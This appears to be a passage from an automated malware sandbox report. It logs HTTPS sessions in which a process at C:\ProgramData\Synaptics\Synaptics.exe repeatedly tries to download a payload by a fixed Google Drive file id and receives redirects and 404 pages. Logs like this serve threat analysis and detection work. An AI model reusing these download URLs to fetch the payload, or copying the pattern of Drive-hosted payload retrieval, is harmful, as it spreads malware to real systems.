                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              115192.168.2.750118142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:22 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              116192.168.2.750122216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:22 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:22 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-1Nyggq4mnR8GsIgEG0W05Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              117192.168.2.750128216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:22 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:23 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:23 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-E6ktV8VvAt5xDYXS7b0Vkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              118192.168.2.750134216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:23 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:23 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-eDH9IfX4GNKgnO4F_-TVqw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              119192.168.2.750133142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:23 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC5qKbUWqEjAv_2QWoAgqyLPY5AEqBBiMu4H7NXcKArSxlunctDSp-D289QVkQVKR-wp
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:23 GMT
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-6iAdYXwOHgzDW6ZUyMZVWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:23 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:23 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 37 71 58 4d 4a 36 57 6f 35 6f 4b 70 62 55 2d 46 43 6d 4b 6b 58 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="7qXMJ6Wo5oKpbU-FCmKkXA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:23 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              120192.168.2.750140142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:23 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4EKrRzDC6V7XZ2kaAd8tKUDWdQ9C_H3aMNN5KyhSYg3iypqV1Bxsus55zEe2mDX-f3
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:24 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-0bNmzfulS7w6-WAGh6lgDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:29:24 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 39 47 4f 63 34 73 6f 50 35 33 61 77 6e 4e 34 4c 4e 36 46 77 32 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="9GOc4soP53awnN4LN6Fw2w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:29:24 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              121192.168.2.750139216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:23 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:24 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:24 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Ohtp9JgBkmXpu4HypVK0XA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              122192.168.2.750141216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:24 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:24 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-YUTVTyZHc1kPDrivS5aL2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              123192.168.2.750144142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:29:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:29:24 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4O8GMataXfOiOZy6yD4fnVvrv013mD7qWpJP_Skj3VpArmB1sks3gMRhEcNEpzqyII
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:29:24 GMT
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-3RlGUm-_RgE7R4gc7J5u5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:29:24 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
